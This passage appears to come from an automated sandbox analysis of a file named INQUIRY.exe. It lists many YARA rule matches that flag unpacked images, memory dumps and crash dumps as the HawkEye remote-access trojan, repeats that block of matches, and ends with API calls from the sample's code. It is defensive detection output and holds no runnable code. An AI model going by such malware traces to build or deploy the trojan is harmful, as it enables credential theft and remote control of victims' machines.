                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004557F8 NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044A3C8 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043A6DC NtdllDefWindowProc_A,GetCapture,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0042E904 NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004557F8 NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
